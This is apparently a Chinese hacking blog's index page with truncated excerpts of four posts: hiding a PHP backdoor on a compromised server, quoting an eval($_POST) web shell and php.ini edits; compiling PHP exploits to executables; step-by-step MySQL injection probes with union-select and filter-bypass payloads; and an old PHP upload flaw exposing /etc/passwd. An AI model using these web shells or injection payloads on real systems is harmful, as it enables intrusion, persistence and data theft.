作者:lis0
来源:lis0's Blog
测试环境:Apache/2.0.49 (Win32) PHP/4.3.1+Winxp sp2
最近在看完了一个程序的代码后又重新温习了PHP中文手册, 在看的过程中突然想到了一个隐藏后门的方法,拿来给大家分享下 嘿嘿:) 在入侵服务器后如何能将后门做到不被管理员大叔发现这是很重要的。因此就出现了各种隐藏的方法,对于php来说大多是插入<?eval($_POST[a]);? >或者include()函数隐藏然后修改文件时间等等。网上多的很我就不在这罗嗦了。
在我们取得一个服务器的最高权限后我们可以通过修改服务器的配置文件php.ini来达到我们隐藏后门的目的。修改系统目录下面的php.ini文件。在php.ini文件第395-397和第420-424一段
阅读全文 »
从一位叫 like 的朋友那里得知这个小工具的,然后去 google 了一下,就有了这篇日志。
Bambalam PHP EXE Compiler/Embedder 是一个小巧的命令行工具,能够把 php 脚本转换成 windows 的标准 exe 可执行文件,我们可以用他把那些 php 写的 exp 转换成 exe ,这样就不用再在 php 环境下运行 exp 了。
特点:
阅读全文 »
来源:Neeao
1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from 阅读全文 »
作者:剑心
来源:Loveshell
在早期的PHP版本中,上传文件很可能是通过如下的代码实现的:......
if (isset($_FILES['file'])) {
$tmp_name = $_FILES['file']['tmp_name'];
}
if (file_exists($tmp_name)) {
copy($tmp_name,$destfile);
}
......
但是很可能会被伪造一个$_FILES['file']数组出来,如果tmp_name的内容会被指定为/etc/passwd等敏感信息的内容,那么很容易出现安全问题。PHP在后来的版本中用is_uploaded_file() 阅读全文 »
